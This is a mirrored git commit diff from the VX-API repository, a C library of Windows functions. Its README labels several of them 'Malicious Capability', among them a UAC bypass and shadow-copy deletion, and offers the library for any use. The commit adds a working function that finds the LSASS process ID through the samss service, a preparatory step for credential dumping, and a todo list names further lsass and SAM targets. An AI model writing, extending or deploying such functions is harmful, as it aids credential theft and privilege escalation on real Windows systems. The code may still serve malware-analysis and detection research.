mirror of https://github.com/vxunderground/VX-API
parent
1653f4ef37
commit
f7651a0696
|
@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
|
|||
|
||||
# VX-API
|
||||
|
||||
Version: 2022.210
|
||||
Version: 2022.215
|
||||
|
||||
Developer: smelly__vx
|
||||
|
||||
|
@ -126,12 +126,12 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| MpfComVssDeleteShadowVolumeBackups | am0nsec | Malicious Capability |
|
||||
| OleGetClipboardData | Microsoft | Malicious Capability |
|
||||
| UacBypassFodHelperMethod | winscripting.blog | Malicious Capability |
|
||||
| MpfGetLsaPidFromServiceManager | modexp | Malicious Capability |
|
||||
| MpfGetLsaPidFromRegistry | modexp | Malicious Capability |
|
||||
|
||||
# Todo list
|
||||
| Functionality | Author | Note |
|
||||
| ------------- | ------ | ---- |
|
||||
| QueryServiceStatusEx | modexp | SAMSS |
|
||||
| NtQueryInformationFile | modexp | lsass |
|
||||
| NtFsControlFile | modexp | lsass pipe |
|
||||
| NtQueryOpenSubKeysEx | modexp | sam |
|
||||
|
|
|
@ -79,6 +79,3 @@ typedef VOID(WINAPI* WTSFREEMEMORY)(PVOID);
|
|||
*******************************************/
|
||||
typedef BOOL(WINAPI* CONVERTSIDTOSTRINGSIDW)(PSID, LPWSTR*);
|
||||
typedef BOOL(WINAPI* CONVERTSIDTOSTRINGSIDA)(PSID, LPSTR*);
|
||||
typedef SC_HANDLE(WINAPI* OPENSCMANAGERW)(LPCWSTR, LPCWSTR, DWORD);
|
||||
typedef SC_HANDLE(WINAPI* OPENSERVICEW)(SC_HANDLE, LPCWSTR, DWORD);
|
||||
typedef SC_HANDLE(WINAPI* QUERYSERVICESTATUSEX)(SC_HANDLE, SC_STATUS_TYPE, LPBYTE, DWORD, LPDWORD);
|
||||
|
|
|
@ -23,7 +23,7 @@ int main(VOID)
|
|||
{
|
||||
DWORD dwError = ERROR_SUCCESS;
|
||||
|
||||
dwError = GetPidFromPidBruteForcingW((PWCHAR)L"cmd.exe");
|
||||
dwError = MpfGetLsaPidFromServiceManager();
|
||||
|
||||
return dwError;
|
||||
}
|
||||
|
|
|
@ -0,0 +1,31 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD MpfGetLsaPidFromServiceManager(VOID)
|
||||
{
|
||||
SC_HANDLE Manager = NULL, ServiceHandle = NULL;
|
||||
DWORD ProcessId = ERROR_SUCCESS, BytesNeeded = ERROR_SUCCESS;
|
||||
SERVICE_STATUS_PROCESS ServiceStatus = { 0 };
|
||||
|
||||
Manager = OpenSCManagerW(NULL, NULL, SC_MANAGER_CONNECT);
|
||||
if (Manager == NULL)
|
||||
return 0;
|
||||
|
||||
ServiceHandle = OpenServiceW(Manager, L"samss", SERVICE_QUERY_STATUS);
|
||||
if (ServiceHandle == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if(!QueryServiceStatusEx(ServiceHandle, SC_STATUS_PROCESS_INFO, (LPBYTE)&ServiceStatus, sizeof(ServiceStatus), &BytesNeeded))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ProcessId = ServiceStatus.dwProcessId;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if(ServiceHandle)
|
||||
CloseServiceHandle(ServiceHandle);
|
||||
|
||||
if (Manager)
|
||||
CloseServiceHandle(Manager);
|
||||
|
||||
return ProcessId;
|
||||
}
|
|
@ -207,6 +207,7 @@
|
|||
<ClCompile Include="MpfComModifyShortcutTarget.cpp" />
|
||||
<ClCompile Include="MpfComVssDeleteShadowVolumeBackups.cpp" />
|
||||
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp" />
|
||||
<ClCompile Include="MpfGetLsaPidFromServiceManager.cpp" />
|
||||
<ClCompile Include="OleGetClipboardData.cpp" />
|
||||
<ClCompile Include="RecursiveFindFile.cpp" />
|
||||
<ClCompile Include="RemoveDllFromPeb.cpp" />
|
||||
|
|
|
@ -372,6 +372,9 @@
|
|||
<ClCompile Include="TryLoadDllMultiMethod.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfGetLsaPidFromServiceManager.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="Internal.h">
|
||||
|
|
|
@ -134,6 +134,7 @@ BOOL MpfComModifyShortcutTargetA(_In_ PCHAR LnkPath, _In_ PCHAR LnkExecutionPro
|
|||
BOOL UacBypassFodHelperMethodA(_In_ PCHAR PathToBinaryToExecute, _Inout_ PPROCESS_INFORMATION Pi);
|
||||
BOOL UacBypassFodHelperMethodW(_In_ PWCHAR PathToBinaryToExecute, _Inout_ PPROCESS_INFORMATION Pi);
|
||||
DWORD MpfGetLsaPidFromRegistry(VOID);
|
||||
DWORD MpfGetLsaPidFromServiceManager(VOID);
|
||||
|
||||
//evasion
|
||||
BOOL CreateProcessWithCfGuardW(_Inout_ PPROCESS_INFORMATION Pi, _In_ PWCHAR Path);
|
||||
|
|
Loading…
Reference in New Issue